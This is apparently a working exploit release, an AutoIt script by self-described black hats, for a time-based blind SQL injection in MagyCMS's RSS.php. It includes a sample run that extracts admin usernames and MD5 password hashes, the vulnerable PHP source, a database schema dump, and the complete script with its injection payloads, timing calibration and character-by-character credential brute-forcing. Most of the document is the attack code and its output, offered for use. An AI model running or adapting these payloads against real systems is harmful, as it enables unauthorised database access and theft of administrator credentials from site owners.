---------------------------------------- ---------------------------------------- [+] TRUE AT OFFSET [3] [+] Currently MD5 hash is : 74a5d1ffce472f0206dd4 Responce Time: 1164.49911938021 ms. Need to fetch other: [11] symbol(s). Logging to axa.txt... ---------------------------------------- ---------------------------------------- [+] TRUE AT OFFSET [3] [+] Currently MD5 hash is : 74a5d1ffce472f0206dd48 Responce Time: 1100.86175303173 ms. Need to fetch other: [10] symbol(s). Logging to axa.txt... ---------------------------------------- ---------------------------------------- [+] TRUE AT OFFSET [3] [+] Currently MD5 hash is : 74a5d1ffce472f0206dd48c Responce Time: 1083.53360421294 ms. Need to fetch other: [9] symbol(s). Logging to axa.txt... ---------------------------------------- ---------------------------------------- [+] TRUE AT OFFSET [3] [+] Currently MD5 hash is : 74a5d1ffce472f0206dd48c8 Responce Time: 1094.66155316143 ms. Need to fetch other: [8] symbol(s). Logging to axa.txt... ---------------------------------------- ---------------------------------------- [+] TRUE AT OFFSET [3] [+] Currently MD5 hash is : 74a5d1ffce472f0206dd48c8e Responce Time: 1079.25520931559 ms. Need to fetch other: [7] symbol(s). Logging to axa.txt... ---------------------------------------- ---------------------------------------- [+] TRUE AT OFFSET [3] [+] Currently MD5 hash is : 74a5d1ffce472f0206dd48c8ee Responce Time: 1089.64739495061 ms. Need to fetch other: [6] symbol(s). Logging to axa.txt... ---------------------------------------- ---------------------------------------- [+] TRUE AT OFFSET [3] [+] Currently MD5 hash is : 74a5d1ffce472f0206dd48c8ee4 Responce Time: 1075.80823227561 ms. Need to fetch other: [5] symbol(s). Logging to axa.txt... ---------------------------------------- ---------------------------------------- [+] TRUE AT OFFSET [3] [+] Currently MD5 hash is : 74a5d1ffce472f0206dd48c8ee44 Responce Time: 1078.8765208783 ms. Need to fetch other: [4] symbol(s). 
Logging to axa.txt... ---------------------------------------- ---------------------------------------- [+] TRUE AT OFFSET [3] [+] Currently MD5 hash is : 74a5d1ffce472f0206dd48c8ee44c Responce Time: 1110.63264652718 ms. Need to fetch other: [3] symbol(s). Logging to axa.txt... ---------------------------------------- ---------------------------------------- [+] TRUE AT OFFSET [3] [+] Currently MD5 hash is : 74a5d1ffce472f0206dd48c8ee44ca Responce Time: 1081.87636987911 ms. Need to fetch other: [2] symbol(s). Logging to axa.txt... ---------------------------------------- ---------------------------------------- [+] TRUE AT OFFSET [3] [+] Currently MD5 hash is : 74a5d1ffce472f0206dd48c8ee44ca6 Responce Time: 1079.1007891431 ms. Need to fetch other: [1] symbol(s). Logging to axa.txt... ---------------------------------------- ---------------------------------------- [+] TRUE AT OFFSET [3] [+] Currently MD5 hash is : 74a5d1ffce472f0206dd48c8ee44ca6c Responce Time: 1100.79408534274 ms. Need to fetch other: [ *NONE* ] symbol(s). Logging to axa.txt... ---------------------------------------- ---------------------------------------- ---------------------------------------- Username: [manager] MD5 HASH: [04e8e47e68a7b58594fdcf994c5d490d] ---------------------------------------- ---------------------------------------- Username: [root] MD5 HASH: [e10adc3949ba59abbe56e057f20f883e] ---------------------------------------- ---------------------------------------- Username: [d] MD5 HASH: [326373da562269316790326c00a9972f] ---------------------------------------- ---------------------------------------- Username: [test] MD5 HASH: [74a5d1ffce472f0206dd48c8ee44ca6c] ---------------------------------------- ---------------------------------------- ---------------------------------------- [+] Usernames And MD5 passwords saved to : mainlog.txt [+] ---------------------------------------- ---------------------------------------- [+] Exploit Finished!. 
GooD Luck;) [+] ---------------------------------------- [+] Exit! [+]
--------------------------------------------------------------------
Vulnerable Code Section:
========================== BEGIN ===================================
//magycms/Framework/public/RSS.php?Page=

Where the injection is: RSS.php copies the `Page` GET parameter straight into `$page` (no escaping, no whitelist) and interpolates it into a string literal of a SQL query - the pattern is visible below as `SELECT `ID` FROM `$tbl_Pages` WHERE `Name`='$page' ...`, and getCatByPage($page), which runs first, evidently performs the same lookup. A single quote in `Page` breaks that literal; ADOdb's Execute() then returns false and the unconditional `$hResult->NumRows()` call dies with the "Call to a member function NumRows() on a non-object" fatal error the exploit uses as its fingerprint. The fingerprint (and the injection) only works when the quote reaches PHP unescaped, i.e. with magic_quotes_gpc off. Note: the head of this listing (everything up to the first `$db->`) was lost when the advisory was rendered as HTML - the `<?php` opening was swallowed as a tag - so getCatByPage() begins mid-statement here.

/* Execute($query);
    if (!$hResult->NumRows()) return -1;
    $row = $hResult->FetchRow();
    $ID = $row[0];
    // Fetch category form DB;
    $query = "SELECT `Category` FROM $tbl_News_Config WHERE `ID`=$ID AND `site`=$SITEID";
    $hResult = $db->Execute($query);
    if (!$hResult->NumRows()) return -1;
    $row = $hResult->FetchRow();
    return $row[0];
}

//////////////////// Opening database connection ////////////////
$db = &ADONewConnection($DBType);
$db->PConnect($DBServer,$DBUserName,$DBPassword,$DBName);
// Switch to the specified charset
if($DBType=="mysql") $db->Execute("SET NAMES \"$DBCharset\"");

///////////////////////// Get Site ID ///////////////////////////
if (isset($_GET['site'])) {
    $SITEID = $_GET['site'];
    if (!is_numeric($SITEID)) $SITEID = 1;
} else {
    $SITEID = 1;
}

////////////////// Get site URL from DB /////////////////////////
$hResult = $db->Execute("SELECT `URL` FROM $tbl_Sites WHERE `ID`=$SITEID");
$Root_URL = "aaa";
if ($hResult->NumRows()) {
    $row = $hResult->FetchRow();
    $Root_URL = $row[0];
}
//echo($Root_URL."
"); ////////////////// Retrieving Language Prefixes ///////////////// $Lang_Prefix = array(); $hpResult = $db->Execute("SELECT `ID`, `Prefix` FROM $tbl_Lang WHERE `site`=$SITEID"); if($hpResult) { for($i = 0; $i < $hpResult->RowCount(); $i++) { $apResult = $hpResult->FetchRow(); $Lang_Prefix[$apResult[0]] = $apResult[1]; } } ///////////////////////// Determine language //////////////////// if (isset($_GET['lang'])) { $lang = $_GET['lang']; if (!is_numeric($lang)) $lang = GetSiteSetting('Default_lang'); } else { $lang = GetSiteSetting('Default_lang'); } ///////////////////////// Determine news Page and Category ////// $cat = -1; $page = ""; if (isset($_GET['Page'])) { $page = $_GET['Page']; $cat = getCatByPage($page); } //////////////////// Get Page information if such exists //////// $title = "News"; $text = ""; if ($page != "") { $pQuery = "SELECT `ID` FROM `$tbl_Pages` WHERE `Name`='$page' AND `site`=$SITEID"; $hResult = $db->Execute($pQuery); if (!$hResult->NumRows()) return -1; $row = $hResult->FetchRow(); $ID = $row[0]; // Fetch Title and Text form DB; $pQuery = "SELECT Title, Text FROM $tbl_News_Config AS s INNER JOIN $tbl_News_Config_Data AS d ON s.ID = d.ID WHERE s.ID=$ID AND d.language=$lang AND site=$SITEID"; $hResult = $db->Execute($pQuery); if ($hResult->NumRows()) { $row = $hResult->FetchRow(); $title = $row[0]; $text = $row[1]; } } // Construct link to News page $mainLink = ($page == "") ? 
"" : $Root_URL.CLink::construct($page, $lang); ///////////////////////// GET NEWS ////////////////////////////// if ($cat == -1) $mainQuery = "SELECT s.`ID`, s.`Date`, d.`Title`, d.`ShortText` , `start_date` , `end_date` FROM $tbl_News_Struct AS s INNER JOIN $tbl_News_Data AS d ON s.`ID`=d.`ID` WHERE d.language=$lang AND s.`site`=$SITEID"; else $mainQuery = "SELECT s.`ID`, s.`Date`, d.`Title`, d.`ShortText` , `start_date` , `end_date` FROM $tbl_News_Struct AS s INNER JOIN $tbl_News_Data AS d ON s.`ID`=d.`ID` WHERE d.language=$lang AND s.`site`=$SITEID AND s.`Category`=$cat"; $hResult = $db->Execute($mainQuery); // check if there is something to echo if (!$hResult->NumRows()) die(); ///////////////////////// Echo News in RSS ////////////////////// CRSS::echoHeader($title, $mainLink, $text, getdate(), $Lang_Prefix[$lang]); for ($i = 0; $i < $hResult->NumRows(); $i++) { $row = $hResult->FetchRow(); $today = date("Y-m-d H:i:s"); $startDate = $row[4]; $endDate = $row[5]; $startDateIsOK = (substr($startDate, 0, 10) == "0000-00-00" || $today >= $startDate); $endDateIsOK = (substr($endDate, 0, 10) == "0000-00-00" || $today <= $endDate); if ( $startDateIsOK && $endDateIsOK ) { $link = $Root_URL.CURL::getFormattedURL(CLink::construct($page, $lang), "id", "{$row[0]}"); CRSS::echoItem($row[2], $link, $link, $row[1], $row[3]); } } CRSS::echoFooter(); ?> '); // echo RSS opening tags echo('\n'); if ($title != "") echo ("$title\n"); if ($link != "") echo ("$link\n"); if ($desc != "") echo ("$desc\n"); if ($lastBD != "") echo ("$lastBD Mon, 12 Sep 2005 18:37:00 GMT\n"); if ($lang != "") echo ("$lang en-us\n"); } public static function echoFooter () { // echo RSS closing tags echo(''); } public static function echoItem($title, $link, $guid, $pubDate, $desc) { // Strip undesired characters from description $desc = ereg_replace("&[^;]*;", "", $desc); $desc = strip_tags($desc); // Turn Published date into RFC format $time = strtotime($pubDate); $pubDate = gmdate("r", $time); // Echo 
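the item
        echo ("\n");
        if ($title != "") echo ("$title\n");
        if ($link != "") echo ("$link\n");
        if ($guid != "") echo ("$guid\n");
        if ($pubDate != "") echo ("$pubDate\n");
        if ($desc != "") echo ("$desc\n");
        echo ("\n");
    }
}
?>
*/
========================= END OF VULNERABLE CODE SECTION ===========================

mysql> show tables \g
+-------------------------+
| Tables_in_SNIP_SNIP_SNIP|
+-------------------------+
| admin_menus             |
| admin_menus_category    |
| admin_menus_permissions |
| admin_users             |
| banner_categories       |
| banners                 |
| banners_data            |
| banners_struct          |
| cms_languages           |
| cms_messages_categories |
| cms_messages_data       |
| cms_messages_struct     |
| cms_settings            |
| core_messages           |
| counter                 |
+-------------------------+
15 rows in set (0.00 sec)

mysql> explain admin_users \g
+----------+------------------+------+-----+---------+----------------+
| Field    | Type             | Null | Key | Default | Extra          |
+----------+------------------+------+-----+---------+----------------+
| ID       | int(10) unsigned | NO   | PRI | NULL    | auto_increment |
| Username | varchar(100)     | YES  |     | 0       |                |
| Password | varchar(100)     | YES  |     | 0       |                |
| GUID     | varchar(32)      | YES  |     | 0       |                |
| Level    | int(10) unsigned | YES  | MUL | 0       |                |
| Name     | varchar(100)     | YES  |     | 0       |                |
| Email    | varchar(45)      | YES  |     | 0       |                |
| MID      | int(10) unsigned | YES  |     | 0       |                |
+----------+------------------+------+-----+---------+----------------+
8 rows in set (0.00 sec)

*************************************************
A R E   Y O U   R E A D Y?   LETS GOOOOOOOOOOOOOOOOOOOOOOOOOOO!
*************************************************
#ce

; ===========================================================================
; Exploit flow.  Every HTTP request goes through _INetGetSource (INet.au3)
; and every injected condition is answered by MySQL through sleep(1), so the
; only oracle available is the round-trip time of each request.
;   1. read the target URL from the command line,
;   2. make sure the vulnerable endpoint itself answers (the earlier build
;      fetched packetstormsecurity.org for this, which told a third party that
;      the tool was being run and proved nothing about the target),
;   3. fingerprint the injection point by the PHP fatal error a stray quote
;      triggers in RSS.php ($db->Execute() returns false on a syntax error and
;      the following ->NumRows() call dies),
;   4. calibrate the timing oracle with three TRUE and three FALSE probes and
;      derive the decision threshold from BOTH sides (the earlier build
;      measured the FALSE baseline but never used it; its 0.8 x TRUE rule
;      misfires as soon as the page itself is slow),
;   5. pull admin_users.Username one character at a time,
;   6. pull admin_users.Password (32 hex digits) for every username found -
;      the earlier build never got here because a leftover debug Exit (and an
;      _ArrayDisplay popup) ended getusername() first,
;   7. print and save the username/hash pairs, matched by row offset.
; ===========================================================================
Global Const $MAX_USERS = 6             ; admin_users rows probed (offset 0..5), as before
Global Const $MAX_USERNAME_LEN = 20     ; longest username recovered per row, as before
Global Const $MD5_LEN = 32              ; hex digits in an MD5 hash
Global Const $MIN_SLEEP_GAP_MS = 500    ; sleep(1) must add at least this much over the FALSE baseline
Global Const $LOG_FILE = 'axa.txt'      ; per-character progress log (current directory)
Global Const $RESULT_FILE = 'mainlog.txt' ; final username/hash list (script directory)

Global $USERNAMES_IN_ARRAY[$MAX_USERS]      ; index = row offset; '' when no name was recovered
Global $MD5HASHSTRINGSIN_ARRAY[$MAX_USERS]  ; index = row offset; '' when no hash was recovered
Global $dd = ''                             ; formatted summary written to $RESULT_FILE
Global $host, $target, $useragent, $separator, $true = ''
Global $docalcavg = 0, $avgfalsecondition = 0, $threshold_ms = 0
Global $array, $bruteusernames

; ------------------------------ command line -------------------------------
If $CmdLine[0] = 0 Then
    ; console build (Change2CUI=y): usage belongs on the console, not in a MsgBox
    ConsoleWrite("This is a console application." & @CRLF & "Usage: " & @CRLF & @ScriptName & ' http://targetsite.tld' & @CRLF)
    Exit
EndIf
; trailing slashes are stripped so "http://site/" does not turn into "http://site//magycms/..."
$host = StringRegExpReplace(StringStripWS($CmdLine[1], 3), '/+$', '')
If $host = '' Then
    ConsoleWrite(@CRLF & '[+] Empty Command Line Argument? WTF? [+]' & @CRLF)
    Exit
EndIf

; --------------------------------- banner ----------------------------------
ConsoleWrite(@CRLF)
$hellomsg = _StringRepeat('#', 54) & @CRLF
$allmsg = $hellomsg & '# MagyCMS v2.0.1121 BETA Blind SQL Injection Exploit #' & @CRLF & _
        '# Exploitation technique: Time Based                 #' & @CRLF & _
        '# Author: AkaStep & BOT_25                           #' & @CRLF & _
        $hellomsg
ConsoleWrite($allmsg)

$useragent = 'Mozilla/5.0 (Windows NT 5.1; rv:14.0) Gecko/20100101 Firefox/14.0.1'
$separator = @CRLF & _StringRepeat('-', 40) & @CRLF
$target = $host & "/magycms/Framework/public/RSS.php?Page="

; ------------------------- is the target reachable? ------------------------
ConsoleWrite($separator & '[+] Verifying that the target answers.... Please Wait...[+] ' & $separator)
HttpSetUserAgent($useragent)
_INetGetSource($target, True)
If @error Then
    ConsoleWrite($separator & "[+] Sorry Dude! No answer from " & $host & ". [+] " & @CRLF & "[+] Can't continue...Exit. [+] " & $separator)
    Exit
EndIf
ConsoleWrite($separator & '[+] Target is reachable .... [+] ' & $separator)

; ------------------------------- charsets ----------------------------------
; MySQL compares strings case-insensitively under its default collations, so
; lower-case candidates also match upper-case usernames.  The username set is
; the earlier one (']' '^' '_' '`' a-z '{' '|' '}' '~' 0-9) plus '.', '-' and
; '@' so that e-mail style logins are recovered as well; none of these needs
; quoting inside the injected string literal.  Hashes are plain hex.
$bruteusernames = StringSplit('abcdefghijklmnopqrstuvwxyz0123456789_.-@]^`{|}~', '', 2)
$array = StringSplit('0123456789abcdef', '', 2)

; ------------------------- vulnerability fingerprint ------------------------
; Vulnerable builds answer a lone quote with this PHP fatal error.  It only
; shows up when the quote reaches PHP unescaped (magic_quotes_gpc off) and
; display_errors is on; no other detection technique is attempted.
$isvulnerable = 'Call to a member function NumRows() on a non-object'
ConsoleWrite($separator & '[+] Verifying is Target Site Vulnerable? Please wait...[+]' & $separator)
$maybe = _INetGetSource($target & "'", True)
If Not StringInStr($maybe, $isvulnerable, 0) Then
    $true = 'not vulnerable'
    ConsoleWrite($separator & '[+] Target Site is NOT vulnerable:( .Exit. [+]' & $separator)
    Exit
EndIf
$true = 'vulnerable'
ConsoleWrite($separator & '[+] Reply from target site: [+]' & @CRLF & $separator & '[+] - - - - * Vulnerable! * - - - - . [+]' & $separator & @CRLF & _
        '[+] Calibrating the timing oracle (3 TRUE + 3 FALSE probes)...[+]' & @CRLF & $separator & '[+] Please wait... [+] ' & $separator & @CRLF)

; --------------------------- timing calibration ----------------------------
$docalcavg = _AverageProbeMs("' or (select if(8='8',sleep(1),0))-- AnD 9='9", 3)
ConsoleWrite($separator & '[+] AVG sleep timeout FOR TRUE CONDITION IS: ' & $docalcavg & ' ms [+]' & $separator)
$avgfalsecondition = _AverageProbeMs("' or (select if(8='index.php',sleep(1),0))-- AnD 9='9", 3)
ConsoleWrite($separator & '[+] AVG sleep timeout FOR FALSE CONDITION IS: ' & $avgfalsecondition & ' ms [+] ' & $separator)
If $docalcavg - $avgfalsecondition < $MIN_SLEEP_GAP_MS Then
    ; without a clear gap every later decision would be a coin toss
    ConsoleWrite($separator & '[+] TRUE and FALSE probes are too close (' & $docalcavg & ' vs ' & $avgfalsecondition & ' ms): sleep() is not reaching MySQL or the link is too jittery. Exit. [+]' & $separator)
    Exit
EndIf
; a response counts as TRUE when it lands closer to the TRUE average than to the FALSE one
$threshold_ms = $avgfalsecondition + ($docalcavg - $avgfalsecondition) / 2
ConsoleWrite($separator & '[+] Decision threshold: ' & Int($threshold_ms) & ' ms [+]' & $separator)

getusername()
MD5EDPASSWORD()
ConsoleWrite('[+] Exit! [+]')
Exit

; ---------------------------------------------------------------------------
; Sends one injected request and returns its round-trip time in milliseconds.
; The payload is appended to $target as-is: InetRead accepted the raw quotes
; and spaces against the vendor's stack, so nothing is percent-encoded here.
Func _TimedProbeMs($sPayload)
    Local $hTimer = TimerInit()
    HttpSetUserAgent($useragent)
    _INetGetSource($target & $sPayload, True)
    Return TimerDiff($hTimer)
EndFunc   ;==>_TimedProbeMs

; Mean round-trip time of $iRuns identical probes, as an integer number of ms.
Func _AverageProbeMs($sPayload, $iRuns)
    Local $i, $nTotal = 0
    For $i = 1 To $iRuns
        $nTotal += _TimedProbeMs($sPayload)
    Next
    Return Int($nTotal / $iRuns)
EndFunc   ;==>_AverageProbeMs

; Builds the row-scoped time-based payload for admin_users: the injected
; subquery sleeps one second when $sCondition holds for the row at offset
; $iRow.  The trailing "-- " comment swallows the rest of RSS.php's WHERE.
Func _Payload($sCondition, $iRow)
    Return "' or (select if(" & $sCondition & ",sleep(1),0) from admin_users limit 1 offset " & $iRow & ")-- AnD 4='4"
EndFunc   ;==>_Payload

; True when the server slept for $sCondition on row $iRow.  $iMs receives the
; measured round-trip time so that callers can log it.
Func _ConditionHolds($sCondition, $iRow, ByRef $iMs)
    $iMs = _TimedProbeMs(_Payload($sCondition, $iRow))
    Return $iMs >= $threshold_ms
EndFunc   ;==>_ConditionHolds

; Recovers the character at 1-based position $iPos of $sColumn for row $iRow
; by trying every candidate in $aCharset, stopping at the first hit.  A hit is
; re-probed once before it is accepted so that a single slow response is not
; mistaken for sleep(1).  $iMs is left holding the time of the last probe.
; Returns '?' when no candidate matches (character outside the charset).
Func _BruteCharAt($sColumn, $iPos, $iRow, ByRef $aCharset, ByRef $iMs)
    Local $i, $sCondition
    For $i = 0 To UBound($aCharset) - 1
        $sCondition = "substr(" & $sColumn & "," & $iPos & ",1)='" & $aCharset[$i] & "'"
        If _ConditionHolds($sCondition, $iRow, $iMs) Then
            If _ConditionHolds($sCondition, $iRow, $iMs) Then Return $aCharset[$i]
        EndIf
    Next
    Return '?'
EndFunc   ;==>_BruteCharAt

; Writes one progress record to the console and appends it to $LOG_FILE.
Func _Log($sText)
    ConsoleWrite($sText)
    FileWrite($LOG_FILE, $sText)
EndFunc   ;==>_Log

; Recovers admin_users.Username for row offsets 0..$MAX_USERS-1 into
; $USERNAMES_IN_ARRAY (index = row offset).  Before each position one cheap
; length(Username)>=pos probe tells whether the name is already complete, so
; short names cost far fewer requests than a fixed 20 positions x charset.
; A row whose very first length probe fails is taken as "no such row" and the
; scan stops there (an admin with an empty username would look the same).
Func getusername()
    Local $iRow, $iPos, $iMs, $sName, $sChar, $iFound = 0
    ConsoleWrite($separator & '[+] Getting To Fetch Username(s) from table... Please wait... [+] ' & $separator)
    For $iRow = 0 To $MAX_USERS - 1
        $sName = ''
        For $iPos = 1 To $MAX_USERNAME_LEN
            If Not _ConditionHolds("length(Username)>=" & $iPos, $iRow, $iMs) Then ExitLoop
            $sChar = _BruteCharAt("Username", $iPos, $iRow, $bruteusernames, $iMs)
            $sName &= $sChar
            _Log($separator & '[+] TRUE AT OFFSET [' & $iRow & '] Currently : [' & $sName & ']. Responce Time: ' & $iMs & ' ms. Logging to ' & $LOG_FILE & '... [+]' & $separator)
        Next
        If $sName = '' Then
            ConsoleWrite($separator & '[+] No row at offset ' & $iRow & ' - admin_users is exhausted. [+]' & $separator)
            ExitLoop
        EndIf
        $USERNAMES_IN_ARRAY[$iRow] = $sName
        $iFound += 1
        ConsoleWrite($separator & '[#] Username' & $iRow & ' => [' & $sName & '] [#]' & $separator)
    Next
    ConsoleWrite($separator & '* Total ' & $iFound & ' users *' & $separator)
    ConsoleWrite($separator & '[+] END OF USERNAME FETCHING. PREVIOUS RECORDS ARE COMPLETE USERNAMES [+]' & $separator)
EndFunc   ;==>getusername

; Recovers admin_users.Password for every row that yielded a username, then
; prints and saves the pairs.  The sample run above shows 32-digit unsalted
; MD5 hashes; a '?' in a recovered hash marks a position that is not a hex
; digit, i.e. a password that is not stored that way.  Hashes are kept at the
; same index as their username, so a row whose hash could not be read no
; longer shifts the pairing of the remaining rows.
Func MD5EDPASSWORD()
    Local $iRow, $iPos, $iMs, $sHash, $sChar, $iLeft
    If Not ($true = 'vulnerable') Then Return
    ConsoleWrite($separator & '[+] GOING TO FETCH MD5 PASSWORDS. This may take few minutes too. Please wait... [+]' & $separator)
    For $iRow = 0 To UBound($USERNAMES_IN_ARRAY) - 1
        If $USERNAMES_IN_ARRAY[$iRow] = '' Then ContinueLoop
        $sHash = ''
        For $iPos = 1 To $MD5_LEN
            $sChar = _BruteCharAt("Password", $iPos, $iRow, $array, $iMs)
            $sHash &= $sChar
            $iLeft = $MD5_LEN - $iPos
            If $iLeft = 0 Then $iLeft = ' *NONE* '
            _Log($separator & '[+] TRUE AT OFFSET [' & $iRow & '] [+]' & @CRLF & 'Currently MD5 hash is : ' & $sHash & @CRLF & _
                    'Responce Time: ' & $iMs & ' ms.' & @CRLF & 'Need to fetch other: [' & $iLeft & '] symbol(s). ' & @CRLF & _
                    'Logging to ' & $LOG_FILE & '... ' & $separator)
        Next
        $MD5HASHSTRINGSIN_ARRAY[$iRow] = $sHash
    Next

    ; ---- summary: one entry per recovered row, printed and saved ----
    $dd = ''
    For $iRow = 0 To UBound($USERNAMES_IN_ARRAY) - 1
        If $USERNAMES_IN_ARRAY[$iRow] = '' Then ContinueLoop
        $dd &= $separator & 'Username: [' & $USERNAMES_IN_ARRAY[$iRow] & '] MD5 HASH: [' & $MD5HASHSTRINGSIN_ARRAY[$iRow] & ']' & $separator
    Next
    ConsoleWrite($separator & $dd & $separator)
    FileWrite(@ScriptDir & "\" & $RESULT_FILE, $separator & 'Target Site: ' & $host & @CRLF & $dd & @CRLF)
    ConsoleWrite($separator & '[+] Usernames And MD5 passwords saved to : ' & $RESULT_FILE & ' [+]' & $separator)
    For $iRow = 0 To 2
        Sleep(1000)
        Beep(200, 300)
    Next
    ConsoleWrite($separator & '[+] Exploit Finished!. GooD Luck;) [+]' & $separator)
EndFunc   ;==>MD5EDPASSWORD

#cs
Thats All!
********************* AZERBAIJAN BLACK HATZ ***********************************
Of course we never forget our friends so, A BIG RESPECTS+THANKS TO ALL:
===========================================================
packetstormsecurity.org
packetstormsecurity.com
packetstormsecurity.net
securityfocus.com
cxsecurity.com
security.nnov.ru
securtiyvulns.com
securitylab.ru
1337day.com
secunia.com
securityhome.eu
exploitsdownload.com
exploit-db.com
to all AA Team + to all Azerbaijan Black HatZ + *Especially to my bro CAMOUFL4G3.*
===========================================================
Thanks + Respect to all friends!
/AkaStep & BOT_25
#ce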